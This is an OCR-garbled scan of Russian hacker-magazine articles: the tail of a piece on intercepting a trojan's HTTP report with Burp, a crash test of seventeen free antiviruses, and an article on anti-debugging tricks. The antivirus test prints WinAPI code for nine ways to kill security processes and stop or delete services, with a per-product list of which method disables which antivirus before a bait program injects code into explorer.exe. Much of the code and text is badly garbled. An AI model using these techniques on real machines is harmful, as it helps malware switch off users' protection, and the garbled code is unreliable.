а вполне легальное 

и высококачествен- 
ное программное 
обеспечение. Что 

не мешает плохим 
людям использовать 
его, атакже модифи- 
цированные версии 
клиентов Теат\емег 
и Наатт, в своих 
нехороших делах. 
Обнаружить такие 
трояны сложно из-за 
«ЧИСТОТЫ» ИСХОДНОЙ 
программы. 


У\УАВМЩМС 


Весь материал предо- 
ставлен в образова- 
тельных целях. Крайне 
не рекомендую играться 
спакетами гтап$у$ 
вВигр ЗиКе в целях спа- 
маили других противо- 
законных действий. 


А вот и он, второй пакет, который содержит 
уже куда более интересную информацию. Здесь 
и почтовый адрес нашего любителя приклю- 
чений (троян был настоящий, почтовый адрес 
на картинке изменен), пароль и номер для до- 
ступа к нашей зараженной машине, имя. Теперь 
в дело вступает сила Вигр — мы можем держать 
пакет столько, сколько потребуется, а также из- 
менять его содержимое, что мы и сделаем, за- 
менив адрес направления отчета на свой соб- 
ственный. Нажимаем Гогмага и бежим смотреть 
почту :). 

Все получилось! Письмо пришло, задача вы- 
полнена. Мы успешно перехватили отчет, внеся 
в него изменения и не нарушив работоспособ- 
ности. На этом практическая часть статьи закан- 
чивается. На вопрос, почему все это получилось 
так «просто», у меня есть ответ: причина кроется 
в использовании авторами программы протокола 
НТТР. 


ЗАКЛЮЧЕНИЕ 

То, что мы тебе сегодня продемонстрировали, 
по сути, самый настоящий еазу Паск. Впрочем, 
главное в нашем деле не процесс, а результат :). = 


На этот раз для тестирования мы отобрали аж 
семнадцать антивирусов, которые объединя- 
ет одно: они все бесплатные. А проверим мы их 
на предмет устойчивости процессов и сервисов, 
которые создаются антивирусами для их нор- 
мальной работы. 


ПРЕДСТАВЛЯЕМ ИСПЫТУЕМЫХ 
. _ 360 щете Зесигиу 2013 
Ад-А\маге Егее Атмги$ + 
Ат Егее Апймги$ 
Апм Этан Оетепаег Егее 
ауаз\! Егее Апмги$ 
А\С Апи-\Мги$ Егее 2013 
Амтга Егее Апимги$ 2013 
Ваши Ап мги$ 2013 
Вкаетепаег Атмги$ Егее Еа оп 
Сотодо Апмги$ 2013 
Кто$ой Апёмги$ 2012 
М!сго5о& Зеситйу Е5зепНа!5 
Рапаа Соца Апймги$ Егее 
Ргеуепттоп Апймги$ Егее 
Взто |щете Зесищу Регзопа! 
Ворбозсап Ищеге{ Зеситу Егее 
ГопеАаит Егее Апмги$ 


Как видим, в списке есть как довольно рас- 
пространенные на территории нашей необъят- 
ной родины антивирусные пакеты, так и изделия 


||-КРАШЕТЕСТ 


: 1 
й ` 
| ве“ 
к м 
й 


Чгоботииехакер.ги 


&.А 
& 


не очень известных производителей, которые ши- 
рокого распространения в нашей стране не полу- 
чили. 


МЕТОДИКАТЕСТИРОВАНИЯ 

Думаю, для тебя не секрет, что каждая антиви- 
русная программа при своем функционировании 
создает несколько процессов и сервисов, в кото- 
рых и заложен функционал по противодействию 
вредоносному воздействию. 

Для проверки была написана небольшая ути- 
лита, которая может уничтожать процессы не- 
сколькими способами и останавливать или уда- 
лять сервисы. 


Способ 1.Уничтожение процесса 
спомощью АР! Тегтта\теРгосе$$ 

С этим способом все предельно ясно и по- 
нятно. Используем стандартную АР!-функцию 
ТегттатеРгосе$$ по ее прямому предназначению 
и убиваем нужные процессы. 


Способ 2. Уничтожение всех потоков про- 
цессаспомощью АР! Тегиипа\еТИгеаа 
Ищем все потоки нужного нам процесса и пооче- 
редно их уничтожаем, применив для этого специ- 
ально обученную АР!-функцию ТегпттаеТИгеаа: 


НАМОЕЕ И$парТИгеаЯ = <= 
СгеафеТоо1'йе]1р325$ пар5По*+= 


][-краш-тест 
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(ТН32С5_5МАРТНКЕАБ, ре.{Н32Ргосе$$10); 

// Перечисляем потоки 

Тпгеа932Е4 "5+ (н5парТигеаа, &е); 

99| _ НИ 
ЗЫ (+е. {Н3З20мпегРгосе$$ТО == ре. НЗ2Ргосе$$10). 
ИИ ОИ ОИ _ 

_ __ НАМОЕЕ ИТИгеаЯ = ОрепТпгеад (ТНВЕАБ_ТЕВМТМАТЕ ‚ = 

_ РАЁЗЕ, %е.%132Тигеаато); —— 


Ри Уничтожаем поток 
Тегт1пафеТигеаа (ИТИгеаа, 9) 


| 


ОНИ | 
,р11е (ТИгеаа32М№ех* (И5парТИгеаа, &е)); _ 


Способ 3. Модификация контекста 

потоканаадрес АР! ЕхКРгосе$$ 

С помощью  АР!-функций — СтежеТоотер32$парзпо, — Тпгеаа3 27“ 
и ТИгеаа3 2Меж перечисляем потоки нужного нам процесса, поочередно их 
замораживаем, затем пишем в ЕР в контексте потока адрес АР!-функции 
ЕхИРгосе$$ и далее возобновляем выполнение потока: 


НАМОЕЕ В5парТИгеаа = ‹ 
СгеафеТоо1йе1р325пар5По*-= 
(ТН32С$_$МАРТНВЕАО, ре. {И32Ргосе$$10); 
__// Перечисляем потоки. —_ 
__ ТЬгеа932Е1г5* (ИбпарТпгеаа, _&е); 
_ ао {_ 
Че (+е. {1320ипегРгосе$$Тр == ре. 4И32Ргосез$То) р: 

НАМОЕЕ ИТЬгеаЯ = ОрепТИгеаа (ТНКЕАО_ОЧЕВУ_ ТМЕОВМАТТОМ Ге 

ТНВЕАО_СЕТ_СОМТЕХТ | ТНКЕАО_5ЕТ_СОМТЕХТ, РАЁЗЕ, + 

фе. ЕН32Тргеаато); . 

Сопфех*Тпгеа4 .Сопех{Е1ав5 = СОМТЕХТ_СОМТВОЕ; _ 


// Замораживаем поток 
5$изрепаТпгеаа (НТИгеаа) ; 
_ ___ бееТогеа@аСоп*жех* (ИТигеаа, &СопфехЕТНгеаа); _ 


а Пишем _В_ ‚ ЕТР. адрес. АРТ. Ех1Ргосе$$ 
СопфехЕТИгеаа.Е1р = (Омово)Ех1Ргосе$$; 
5е{ТИгеаСоп{ех* (ИТпгеаа, &Сопфех«ТНгеаа); 


ИИ. Возобновляем поток 


КезитеТИигеаа (НТпгеаа); 
} 


В ие (Тнгеаа32МехЕ (н$партТНгеаа, &ее)); 


Способ 4. Создание удаленного потока с вызовом АР! 
Ех"Ргосе$$ 

С помощью АР!-функции АЯСгезжеЧзегГигеаа создаем в нужном процессе по- 
ток, в котором вызываем ЕхИРгосез$: 


// Ищем процесс с нужным именем 
НАМОЕЕ Н5парзНоЕ = Сгеа*еТоо1Ие1р325$пар$По*+ = 
(ТН32С$_$МАРРКОСЕ$ $, @); 
Ргосе5$32Е1г5* (И5пар5Но*, &ре); 
до {_ | 
ТЕ ( _+сзстр(ре. 2ЕхеЕ11е, Ргосез Мате) = -в). { 
НАМОГЕ ИРгосез$ = ОрепРгосе$$ (РКОСЕ$ $ _СКЕАТЕ_ТНВЕАО | — 
РКОСЕ$$ __\/М _ОРЕВАТТОМ | РКОСЕ$$_\ММ_МВТТЕ, ©, ‹- 
_ре.32Ргосе$$10); _ 
__// Адрес АРТ- -функции _ Ех ЕРгосе$$ В 
_ _ _ ОМОВО Ех1РгосеззАдаг = - (ОМОВО)Ех1+Ргосез5; 
азт 
м 
ризв 
_ рч$П 
_рч$й 
_ Рип Е 
_ ____ _ ри5й 
рч$\ 
ри5П 
ри$Н 
_ рип @ 
_____ ризй | 


х1РгосеззАдаг. 


озеро ос 


1Рго се55 


$9 


Уничтожение процесса с помощью АР/ТегттаеРгосе$$ 


Уничтожение всех потоков процесса с помощью АР/Тегтта{еТйгеая 


Модификация контекста потока наадрес АРГЕхиРгосе$$ 


Создание удаленного потока свызовом АР!ГЕхИРгосе$$ 


Закрытие всеххендлов открытого процесса с вызовом АР!-функции 
БирисаеНапае 


т 
ТЕ 


Последовательный вызов АР!-функций Сгеже оО есь, 
Аз1опРгосе$ТодобОЦеци Тегттае оО ест 


Посылка\М_СУТ окну процесса 


Остановка сервиса 55 


Способы уничтожения процессов и сервисов, использованные нами 
притестировании 


_ са11 ВЕ1Сгеае/зегТигеаяа _ 
_} | 
} 


а — | 
ий11е (Ргосе$$32Мех{ (И5ЗпарЪНо*, &ре)); 


Способ 5. Закрытие всех хендлов открытого процесса с вызо- 
вом АР! -функции ВирИсаеНапа!е 

В цикле от 0 до 4096 вызываем АР! ВирйсаеНапе с параметрами 
ТагоеРгосезНапа и ТагдеНапе равными нулю, а Орйоп$ равным ВУРИ- 
САТЕ_СТОЗЕ_ЗОЧВСЕ. Эти действия закроют все (ну или почти все) хендлы 
открытого процесса: 


НАМОЕЕ ИРгосе$$ = 
ре. ЕНЗ2Ргосе$$10); 
Рог (1п4ех = 09; 1паех < 4996; 1пдех ++)-Оир11саеНапа1 е+= 
(ИРгосе5$, (НАМОЕЕ)1п4ех, МОРЕ, МОЕ, 6, 60, «= 
ОРУРЕТСАТЕ_С10$5Е_5ОЧВСЕ) ; 


_ОрепРгосе$$ (РКОСЕ$$ _БУР_НАМОЕЕ , 0, = _ 


Способ 6. Последовательный вызов АР! -функций 
Сгеае Л оБОЩест, Аз дтРгосез5То4о6ОЩес* 

и Тегтта\е д оБОЦес+ 

Создаем новый объект задания, связываем его с нужным процессом, по- 
том завершаем работу объекта и связанного с ним процесса функцией 
ТегттаецобОЩест: 


// Ищем процесс с нужным именем 
НАМОЕЕ ИЗпар$По* = Сгеа+еТоо1не1р325парзВо*. › 
(ТН32С$_$МАРРКОСЕ$$, 0); 

Ргосе$$32Е1г$* (И5пар5по*, &ре); 

до. т 


"НАМОЕЕ_ РОС и п. ЗЕТ _ОУОТА | =_ 
РВОСЕ$$_ТЕВМТМАТЕ ,@,ре.{НЗ2Ргосез$10); — 

_НАМОЁЕЕ п3Зоб = СгеафедоБО0Б ес (МУ, Ми); 
_А5516пРгосе$$ТоЗобОБ]ес* (Зоб, ИРгосез$); 

_ __ Тегт1пажезоб06 ес (И3о6, 9); 

} _ 
ИН 

ий11е (Ргосе$$32М№ех* (И5пар5$по*, &ре)); 


Способ 7. Посылка\!М_ОШТокну процесса 
Сначала напишем функцию обратного вызова, которая и будет посылать окну 
нужного процесса \М/М_ОУП: 


ВОО САЕЕВАСК Оч1ЕМ1паом$Ргос (НИМО Импа, ЕРАВАМ 1Рагат) 


{ 

УЕОМ@ ргосез$Та; 

веипдомТнгеадргосез5Т4 (пипа, &ргосе$$тТа); 

1+ (ргосез5Та == (410Мб)1Рагат) — _ 
__  Роз\Меззаве(випа, им От, в, 0); —_ 
_  гефжиги ТВУЕ} - и ОИ 
} 


Далее, используя Епип\\паомз, передаем в ранее установленную 
са!баск-функцию Фи \Мтаом/5Ргос 10 нужного нам процесса, после чего окно 
процесса получит М/М_ СИП; 


7 чжект кода 


== —--=—-- 


| 


«Вредоносный» код успешно внедрен 


Способ 8. Остановка сервиса 

Для нужного сервиса делаем Ореп5$егмсе 
с БезгедАссе$$ равным ЗЕАВ\МСЕ_$ТОР, далее ис- 
пользуем функцию Сопто[Зегмсе с параметром 
Сотмщго! равным ЗЕВМ!СЕ СОМТВОЕ _$ТОР: 


п5$СМ = Ореп5СМападег+ + 
_$С_МАМАСЕК _СОММЕСТ 


К<ег\у1сеНапа1е = Ореп$егу1 се (И$СМ, «= 
РгосезМате, _$ЕВ\УТСЕ_$ТОР); 
Сопфго15ег\у1се (п5$егу1сеНапа1е, «= 
ЗЕВ\УТСЕ _СОМТКОЕ_$ТОР, &5егу1се$аки$); 


Способ 9.Удаление сервиса 
Открываем нужный сервис с ШОезиедАссе$$ рав- 
ным ОЕТЕТЕ, далее используем АР! РещеЗегисе: 


п5СМ = Ореп5$СМапавег (МУЦЕ, 
$С_МАМАСЕК _СОММЕСТ) ; 
Ю5егу1сеНапа1е = Ореп$егу1се(И$СМ, «= 
Ргосе$$Мате, ОЕШЕТЕ); 

Ое1ефеъегу1се (ИЗегу1сеНапа1е); 


МОЕ, + 


Программа-приманка 
Для проверки работоспособности антивиру- 
са после наших манипуляций с его процессами 
и сервисами мы воспользовались маленькой 
программкой, написанной на ГАЗМ’е и имитиру- 
ющей вредоносное воздействие. Все очень про- 
сто: внедряем посторонний код в ехрогег.ехе соз- 
данием удаленного потока. В предыдущем тесте 
про крипторы мы использовали точно такую же, 
шифруя ее всякими разными способами. 
Испытание антивируса будет заключаться 
в сравнении реакции на программу-приманку 
до нашего воздействия на процессы и сервисы 
антивируса и после него. Если после воздей- 
ствия антивирус позволит выполниться нашей 
приманке, то ставим этому антивирусу жирный 
минус. Итак, начинаем... 


Збо1МТЕВМЕТЗЕСОНТУ 2013 
Этот антивирус определил нашу приманку 
как Ощецеч а зи5рсюи$ асймцу. Для выполнения 
своих задач он создает четыре процесса: 
360гр.ехе, 
3605$4.ехе, 
ГпидопоаГапо\и.ехе, 
З60ОТгау.ехе 


и два сервиса: 
З60гр, 
ГпидопоГапда\ И. 


Как мы ни старались, но ни один процесс 
и ни один сервис победить не удалось. Антивирус 
стойко продолжал реагировать на нашу подстав- 
ную угрозу. Зачет. 


Произведено внедрение кода в ехрогег.ехе 


о аиасзиИ 


Выключение службы 


Желаете продолжить? 


Программа пытается выключить системную службу ауа$\, отключив экраны в 
реальном времени. Эта операция оставит вашу систему без защиты. 


(Выберите "Нет", если это действие не входит в ваши намерения) 


Реакция ауа$1! Егее Апмтги$ напопытку остановить сервис 


АО-АМ/АВЕ РВЕЕ АМТ ВО$ + 
Этот антивирусный продукт несет на своем борту 
три процесса: 

АдА\аге.ехе, 

АдАм/агеЗегисе.ехе, 

ЗВАМ5$ус.ехе 


и два сервиса: 
Ад-Амаге Зегмсе, 
ЗВАМ$\с. 


Все три процесса элементарно убиваются 
первым способом, и все действие антивируса 
на этом заканчивается. Незачет. 


АМИТТЕВЕЕ АМТ1МВО$ 
Здесь мы имеем два процесса: 
АтШАм.ехе, 
АтШАуЗгу.ехе 


и один сервис: 
ат амгу. 


Оба процесса без боя сдались при первом же 
воздействии ТегттаеРгосез$. Опять двойка. 


АМ\У!$МАВТ ОЕРЕМОЕВ ЕВЕЕ 
С началом своего функционирования антивирус 
т следующие процессы: 

АЗОЗгм.ехе, 

АЗОТгау.ехе, 

АЗО.ехе, 

АОВюскегЗгу.ехе, 

АОВюскеггау.ехе 


и такие сервисы: 
аза$гм, 
АаБоскег$гу. 


Первый процесс убивается созданием в нем 
потока с вызовом ЕхйРгосе$$, работа остальных 
завершается первым способом. Незачет. 


АУА$Т! ЕВЕЕ АМТИВО$ 
Этот антивирус определил наш мнимый зловред 
\ММп32:Еуо-деп[зи$р]. Имеет в своем составе про- 
цессы: 

Ауа{5$\ус.ехе, 

АуаЦ1.ехе, 

ауа3{.зеир 


и один сервис: 
ауа$!! Ап мги$. 


Все попытки убить процессы не увенчались 
успехом. А при попытке остановить сервис анти- 
вирус попросил подтверждения данному дей- 
СТВИЮ. 


А\УСАМТ!-\МВОЗЕВЕЕ 2013 
В программе-приманке этот антивирус увидел 
нечто под названием ОБомпюааег Сепепс. Запу- 
стил для своей работы шесть процессов: 
. амазгм.ехе, 

аудетсх.ехе, 

ауоазадет.ехе, 

аудпзх.ехе, 

ауаш.ехе, 

амомиАзус.ехе 


и два сервиса: 
АУСШОЗАдет, 
амома. 


Все попытки уничтожить процессы и остано- 
вить или удалить сервисы не увенчались успе- 
хом. Антивирус продолжал работать как ни в чем 
не бывало и исправно продолжал реагировать 
на «угрозу». 


А\МВАРВЕЕ АМТИМ!ВО$ 2013 
Этот антивирус в нашем «вредоносном» коде уви- 
О ТА/Нуаскег.Сеп. В составе четыре процесса: 
аузпадо\..ехе, 
аудчцага.ехе, 
аммерога.ехе, 
аудт.ехе. 


Все процессы были успешно ликвидирова- 
ны с помощью четвертого способа — созданием 
удаленного потока в процессах антивируса с вы- 
зовом в этом потоке ЕхИРгосе$$. Плохо. Незачет. 


ВАО АМТИМВО$ 2013 
Тре ргодгат 15$ ацетрипд о тодНу опег 
ргодгат$ — вот что выдал этот антивирус в ответ 
на запуск программы-приманки. Процессы: 
ВА\Зус.ехе, 
Ва\Тгау.ехе, 
ВН!р$$ус.ехе, 


сервисы: 
ВА\$ус, 
ВН!р$$ус. 


Против этого антивируса сработало только 
удаление обоих сервисов, с последующей пере- 
загрузкой компьютера. Тоже двойка. 


ВИТОЕРЕМОЕВ АМТ РО$ ЕВЕЕ ЕО!Т1ОМ 
Имеет в составе три процесса: 

97Насе.ехе, 

97зегм.ехе, 

ираже.ехе 


и один сервис: 
о2зегу. 
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СОМООО Поведенческий анализ 


Приложение сотодок!ег.Ба{ не может быть 
(+) опознано и требует неограниченный доступ к 
вашему компьютеру 


сотодокШег.ра{ 
Неопознанный поставщик 


< 


Изолированный запуск (по умолчанию) 


Обеспечивает выполнение приложения с 
ограничением прав доступа 


Запустить без ограничений 


Разрешить неограниченный доступ к 
вышеуказанному приложению 


Блокировать 
Предотвратит выполнение вышеуказанного 
приложения 


[Г] Доверять этому приложению 


Реакция Сото4о на попытку остано- 
вить сервис 


Успешно противостоял всем нашим попыт- 
кам нарушить его работоспособность. Ни рабо- 
чие процессы, ни сервис сбить с толку нам так 
и не удалось. Зачет. 


СОМОООАМТИВО$ 2013 

При запуске программы-приманки вынес преду- 
преждение о внедрении постороннего кода в про- 
цесс ехрюгег.ехе. Рабочие процессы: 

. саммр.ехе, 

. С5.ехе, 

. С5Пау.ехе, 

. стаадет.ехе, 

. стачцра.ехе, 


сервисы: 
. стаАдет, 
.  стоамии. 


Победить этот антивирус удалось только 
удалением процессов с последующей переза- 
грузкой. При этом, как и всякий раз, когда этот 
антивирус замечает какие-нибудь сомнительные 
действия, было выдано предупреждение о подо- 
зрительной активности. Так что незаметно оста- 
новить деятельность антивируса не удалось. 


КИСЗОРТАМТИЛВО$ 2012 

Придуманную нами «угрозу» распознал как\М/п32. 
Тго].@аепегс.а.(Ксочца). В составе два процесса: 

. Кхезсоге.ехе, 

. Кх@гау.ехе 


и один сервис: 
. Кхезсоге. 


Данный антивирусный продукт стойко выдер- 
жал все испытания и продолжал работать, несмо- 
тря на все наши старания. 


М'СВОЗОЕТЗЕСУНТУ Е55ЕМТИАЕ$ 

На попытку запуска программы-приманки бо- 
дро отреагировал и опознал в ней Тго]ап\Мп32/ 
Асет Вура$$.деп!К. Для обезвреживания этого, 
в общем-то, широко известного антивируса до- 
статочно было убить два его рабочих процесса: 

. тТ5ззесез.ехе, 

. МъМрЕпд.ехе. 


Первый процесс уничтожается простым 
ТеглтаеРгосе$$, второй — модификацией кон- 
текста потока на адрес АР!-функции ЕхкРгосез$. 
Плохо, незачет. 


РАМОАСТОЦО АМТИМВО$ ЕВЕЕ 

Этот антивирус интересен тем, что подозритель- 
ные файлы он проверяет в облаке. В нашей «угро- 
зе» он увидел какой-то безликий Зизрсюи$ НЕ. 


][-краш-тест 


7 Объект нейтрализован 


Подозрительный объект 


с \е5Е тамаге.ехе 


Рапда Соид Апб\уги$ 


Вотчто увидел Рапда Стоца Апимти$ Егее внашей «угрозе» 


Имеет в своем составе следующие процессы: 
. РЭЧАМаш.ехе, 
. РЪУАМНо$.ехе, 
. РУЧАбегмсе.ехе 


и сервисы: 
‚ МапобегмсеМат, 
. РЭоЧАбегмсе. 


Сначала с помощью восьмого способа оста- 
навливаем оба сервиса, затем поочередно уби- 
ваем процессы: первый путем создания потока 
с вызовом в этом потоке ЕхиРгосе$$, остальные 
с помощью первого способа — ТепттаеРгосез$. 
Незачет. 


РВЕУЕМТОМ АМТИМВО$ ЕАЕЕ 

В программе-приманке этот антивирус заподо- 
зрил не что иное, как программу-взломщик. В его 
составе три процесса: 

. А/АзяЧапТ.ехе, 

. А/бсапптазегмсе.ехе, 

. А/Тгау.ехе 


и два сервиса: 
. А/ Азячат Зегмсе, 
. А/ бсаппта Зегмсе. 


Останавливаем оба сервиса способом 8, уби- 
ваем А/Тгау.ехе с помощью ТегттаеРгосез$, 
И «программа-взломщик» беспрепятственно мо- 
жет чинить свои черные дела. 


В1$1МС1МТЕВМЕТ $ЕСУНИТУ РЕРЗОМАЁ 
Этот продукт запускает следующие процессы: 
‚ ВауМопб.ехе, 

. АзГау.ехе 


и сервисы: 
‚ ВАзВамуМоп, 
. АзМогФ\с. 


Применив восьмой способ к А$Мог5ус и де- 
вятый к ВзВауМоп, данный антивирус мы обезо- 
ружили, и он никоим образом не препятствовал 
«вредоносному» воздействию. Плохо. 


ВОВОЗСАМ1МТЕВМЕТ$ЕСОНИТУ ЕВЕЕ 
Сеп\т32.Ехр!огегНцаск.ас\\©аизк!8о(1) — вот 
как отреагировал этот антивирус на наш «вредо- 
носный» код. В состав входят процессы: 

. АбАдептгзе, 

. ЛАЪАТЗгмехе, 

. АзУра$гм.ехе 


и сервисы: 
. ВАорозсап_ВТЗгм, 
. ВАорозсап_Чра$гу. 


Эт 


СТТНОВ 


На @КНи6 лежат исходники утилиты, 
реализующей все описанные в статье 
способы уничтожения процессов, 
остановки и удаления сервисов, атак- 
же исходник программы — имитатора 
вредоносного воздействия. 


Останавливаем оба сервиса восьмым спо- 
собом, убиваем ВЗАдетт.гзе, посылая МММ ОЧТ 
окну процесса, и можем беспрепятственно вне- 
дрять свой код в ехрогег.ехе. Опять незачет. 


2ОМЕАГАВМ ЕВЕЕ АМТ ВО$ 
Программа-приманка определилась этим анти- 
вирусом как НЕЦВ:Тго]ап \ММп3 2 {пуаюег. В соста- 
ве имеет процессы: 

. уэтоп.ехе, 

. ГАРпуасуЗегмсе.ехе, 

.  ганау.ехе 


и сервис: 
. ГАРпуасузегмсе. 


Останавливаем сервис восьмым способом, 
убиваем тагау.ехе, уничтожая все его потоки 
(способ 2), с остальными двумя процессами 
расправляемся последовательным вызовом АР!- 
функций: 

. СгежмецовОЦест; 
. АззопРгосеТоуоБОест,; 
‚ ТеттаеоБОЫес{ (способ 6). 


Плохо, незачет. 


ИТОГ 

Четыре антивируса из семнадцати проверенных 
стойко сопротивлялись нашим попыткам их обез- 
вредить, два (Сото@о и ауа${) спросили разре- 
шение на проведение этих операций, а оставши- 
еся одиннадцать сдались не таким уж и сложным 
способам уничтожения процессов и остановки 
и удаления сервисов. Особенно удручает наличие 
в этом списке довольно распространенных у нас 
антивирусов от Мсгозо8Н, Амга и Рапаа. = 


Аа-Амгаге Егее Атмги$ + 


Ат Егее Апёмги$ ТР 
Амга Егее Апёмги$ 2013 ПЕ 
Мсго$оН Зесищу Еззепна!$ РЕВ 
Ргеметоп Ап1мги$ Егее 5$, ТР 


В зто щегте{ Зеситу Регзопа! 5$, 0$ 


Ворозсап щегте!{ Зеситу Егее 5$, МО 


ГопеА!агт Егее Ап|мги$ 


Те, кто не выдержал испытаний на прочность 


92 Кодинг 
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БИБЛИОТЕКА ® — 
АНТИОТЛАДЧИКА 


Классические приемы антиотладки, 
которые должен знать каждый 


Те, кому положено свои программы отлаживать, с удовольствием кормят нас забагованными 
релизами, которые начинают нормально работать только после третьего обновления. Зато те, 
кого отлаживать программы совсем не просят, с удовольствием в чужом творчестве ковыря- 
ются. Вопросы антиотладки интересны не только исследователям малвари (стоящим по обе 
стороны баррикад), но и кодерам, заботящимся о безопасности своих коммерческих поделок. 


СПЕЦИАЛЬНО ОБУЧЕННЫЕ АР!-ФУНКЦИИ 
В неисчерпаемых недрах \ММтао\$, помимо всем 
известной функции 1|$ВебиддегРгезет, есть еще 
парочка АР|, с помощью которых можно довольно 
просто определить факт запуска программы под 
отладчиком. 

Это СпескАВетоебОербиадегРгезет: 


ра и МОчегуптоптаНнопРгосе$$, вызываемая с Рго- 
Спесккето*ебеБи»зегРгезеп* (ПРгосе$$, += сезпогтанопСа$$ = Ргосез$ОВериодРом (0х7): 


&О620ефес*); 

1+ (О6#)етес*) Е 
ресыей Ре: _а$т 

е15е 


гефигп +а15е; ризп @ 
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И ИМИААУУЧИИ | 


ризй @х4 
ризй Е1аёРо1п*ег 


// Ргосез5Тп+огта1опС1а$$ = += 
//_Ргосез5БериёРоге 
ризй @х7 
ризй Ргосе$$ТО 
са11 МЕОчегуТпРогта*1отРгосе$$ 
} 
1+ (Е1аё) 
гегигп гие; 
е15е 
гефигп +а15е; 


Однако к популярным отладчикам написано 
множество плагинов и скриптов, нейтрализующих 
действия этих АР!. В большинстве случаев это до- 
стигается их перехватом, поэтому перед приме- 
нением этих функций желательно проверить их 
код на целостность и отсутствие перехвата. 


ОБРАБОТКАИСКЛЮЧЕНИЙ 

Достаточно известный и применяемый способ. 
Некоторые АР!-функции, команды или после- 
довательности команд процессора вызывают 
исключения, и, если программа не запущена 
под отладчиком, управление передается зара- 
нее установленному обработчику исключений. 
В то же время если запустить такую программу 
под отладчиком, то эти же самые функции, коман- 
ды или последовательности никаких исключений 
вызывать не будут. 

Общий принцип применения способа: 


ГУ 
{ 


Библиотека антиотладчика 


Антиотладочные приемы 


Общиеприемы 


Специальные АР!-функции 
Программы точки останова 
Флаги отладки 


Аппаратныеточки останова 


Замер времени выполнения 
команд 


ЭНЕ (МЕН) обработчики 


Особенности режима отладки 


Манипуляции сРЕ-форматом 


ЗТАТИ$ ВВЕАКРОМТ 
ЗТАТИ$_$1МСЕЕ_$ТЕР 
ОВС_РЕМТЕХСЕРТ!ОМ_С 
ОВС_ВИ!РЕХСЕРТЮМ 
ОВС_СОМТВОГ_С 
ОВС_СОМТВОЕ_ВВЕАК 
ОВС_СОММАМО_ЕХСЕРТОМ 


ЕХСЕРТ!ОМ \/Х86_$1ИМСЕЕ_$ТЕР 


ЕХСЕРТОМ \\!/Х86 ВВЕАКРОМТ 


Приемы против конкретных отладчиков 


Поиск процессов, окон, 


драйверов и других 
характерных объектов 


Баги отладки 


Х 
Способы определе- 
ния факта отладки 


0х80000003 
0х80000004 
0х40010006 
0х40010007 
0х40010005 
0х40010008 
0х40010009 
0х4000001Е 


0х4000001Е 
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Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности залюбой 
возможный вред, при- 
чиненный материалами 
данной статьи. 


ОПу Адуапсед 1.27 


Видйхез | А9Чнопа! Орной$ | 
АЧднопа! Орной$ 2 
| Апв-БеБид Апб-ОеБид 2 


- Апб-БеБид [МТ-Вазед 05 ой] 

Г КИАль-АНасН [Нагдсоге пефо9] 

Г ИпрапдечЕ хсербойР ег 15 
Г Риосез$32Ме» 

Г Модиез2Мея 

№ СлескАетоебеБидде!Ртезен! 

Г  РибешиюгттавойТ /геад 

Г 2иОчегубузегтиогтлавом 


Г 2иОчиетОЫес 

Г 27мОрепРгосез$ 

Г ТепптаеРгосез$ 

Г бсгатЫе Ехрой ТаЫе 
Г Риблйтдом 


Г бейскСоии 


С Мо Социег [0] С Соитег+1 


[Ш Сапсе! АБоц 
__ бк | Сава | Або | 


МаАКи$ ТН-О/М ©2009 


Х 


Нейтрализация СВескВетоате - 
ОеБиддегРгезептт и №Очегушттогта- 
ЧопРгосе$$ в плагине ОПу Адуапсеа 
для ОПУОБа 


— 


Значения для Ва!5еЕхсерНоп, которые 
можно использовать для антиотладки 


94 Кодинг 


//_ В этом месте нужно написать 
// что-нибудь, что может вызвать 
// нужное нам исключение 


гесигп Тгие; 
} 
__ехсер* (ЕХСЕРТТОМ _ЕХЕСУТЕ_НАМОЁЕВ) 


й 


гефигп Фа1$е; 


} 


В качестве нужных команд или АР! сгодятся: 
пе ОхЗ (одним байтом 0хСС); 

пе ОхЗ (двумя байтами ОхСЬ, 0х03З); 

ше Ох2а; 

иеОх2с (работает только под \\Мт \М За и выше); 
так называемая точка заморозки (команда 
с опкодом 0х1); 

АР!-функция ВБебиодаВгеак (или ОбаВгеаКкРошт 
из Май.а!); 

АР!-функция ВазеЕхсерйоп с некоторыми 
входными значениями; 

флаг трассировки ({гар Лад). 


Код для {гар Над: 


__ ат 


ризп-+а 

ог мога рег[езр], 090х100 
рорфа 

пор 


} 


ЗАМЕР ВРЕМЕНИ ВЫПОЛНЕНИЯ 
КОМАНД 

Когда отладчик присутствует и выполняет по- 
шаговую трассировку, появляется существенная 
задержка между выполнением отдельных команд 
по сравнению с обычным выполнением. 

В системе есть довольно много способов из- 
мерения временных промежутков. Вот некоторые 
из них: 

команда НОТЗС; 

АР!-функция Се скСоит; 

АР!-функция Итебей!те (из ммитт.а!); 

АР!-функция ОчегуРеНоптапсеСоищег; 

АР!-функция С@бу$етТитеА$ЕИеГ те; 

АР!-функция С@Ргосе$$Титез; 

АР!-функция КбескСоитт (или вызов пре- 

рывания шт 0х2А); 


АР!-функция МОчегупоттайопРгосе$$ 
(РгосеззптоитайопС!а$5 = Ргосез$$Титез 
(0х04); 

АР!-функция МЮОчегуптоттайопТигеаа 


(ТПгеаашпогтайопС!а$$ = ТИгеааТите$з (0х01); 
поля структуры КУЗЕА_ЗНАРЕО ПАТА. 


ОМОВО Т1те$фаге = бееТ1сКСоип*(); 


ОмОКО Т1теЕпа = бееТт1скСоип* (); 

1+ ((Т1меЕпа - Т1тезфаг®) > Т1тмеЁ1т1е) 
гесигп гие; 

е15е 
гефигп Фа15е; 


Команду ВОТЗС могут перехватывать и ней- 
трализовать некоторые плагины для ОПУОБд. 
Побороть этот перехват можно, замерив какой- 
нибудь большой (примерно 10 с) промежуток вре- 


Местав КУЗЕВ_$ЗНАВЕО_ОАТА, где можно взять значения времени 


Нагамгаге БгеаКрочп 


Вазе 5=е Эр ой 


00251334 198 Енесие 


00251 346 
00251342 


г 
— 


ревет | 
[00251340 |  [Езесше Ро? | баш | 
[Екесше  РоомЗ | Фашез | 
[Екесше  Роюм4 | Оаше4 | 
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РВап От оропе 


- М9е Гот РЕВ 

- ргофесЕ ОРх 

- Ях Об мпо, РРЫ, проге 

- Боск Вос при: 

- Воск беЕТСКСоупе 

- Поок Се Ргосе55 те 

- гетпоуе ЕР Бгезк 

- сузфот Пап ег ехсербоп$ 

- Слапое ОЙу сарбоп 

- раб МитО 8 уаАпо5 25 
-[имегз]- 

- юад апег 

- М9е СЙУОЬд умпдомиз 

- Поок Ме СопеехТАгеза 

- Поок ВОТ5С 


«ГЕТЕ ГУГО ГСС СУ 


И 


